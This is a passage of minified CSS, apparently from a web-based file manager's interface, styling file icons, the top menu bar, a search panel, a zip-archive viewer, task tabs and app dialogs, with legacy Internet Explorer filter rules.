\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left 